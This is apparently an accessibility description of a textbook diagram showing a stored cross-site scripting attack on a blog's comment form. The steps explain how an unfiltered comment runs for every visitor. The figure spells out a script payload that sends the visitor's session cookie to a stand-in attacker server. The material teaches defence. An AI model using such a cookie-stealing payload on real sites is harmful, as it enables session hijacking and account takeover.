Long description

Back

Two browser windows are shown in the image, with the different steps to be followed in stored X S S attack in action. Browser 1: The address text box is empty. The Content on the page is as follows:

Line 1: Ricardo's blog

Line 2: Security is so easy

Line 3: By colon Ricardo

Line 4: Everyone says security is hard, but I think they are wrong dot Please comment dot dot dot

Line 5: 0 comments

Line 6: Add a comment

Line 7: Name colon text box that reads Nice guy

Line 8: Message colon

There is text box below with code block that reads.

open angle bracket script close angle bracket var i equals new Image open angle bracket close angle bracket semi colon i dot src equals double quotes http colon forward slash forward slash crooks Rus dot xx forward slash steal dot php question mark cookie equals double quotes plus document dot cookie semi colon open angle bracket forward slash script close angle bracket You are so right exclamation mark

Submit button.

Browser 2: The address text box is empty. Content shown in the page is as follows:

Line 1: Ricardo's blog

Line 2: Security is so easy

Line 3: By colon Ricardo

Line 4: Everyone says security is hard, but I think they are wrong dot Please comment dot dot dot

Line 5: 1 comment by colon Nice guy

Line 6: Smiley icon You are so right exclamation mark

There is a text below Browser 2 that reads Here we are displaying an image so you can see the image that represents the hidden script dot It is more common to instead display a tiny transparent image.

The steps for X S S attack in action are as follows.

Step 1: A blog site allows comments on posts by users through a form. Text is written above Browser 1

Step 2: Malicious user double quotes comments double quotes are stored to the blog database without any filtering

Step 3: Every time the comment is displayed to any user the malicious code is executed

Step 4: The malicious code executed on the client computer transmits the logged dash in user's session cookie to a malicious user's server. The cooking mentioned in the image reads a o f 2 0 1 a 9 b 1 0 c 3 4

Step 5: The attacker can use the session cookie to circumvent authentication thereby accessing the server as though logged in by the other user. This is shown by image that is labeled Malicious server.

Back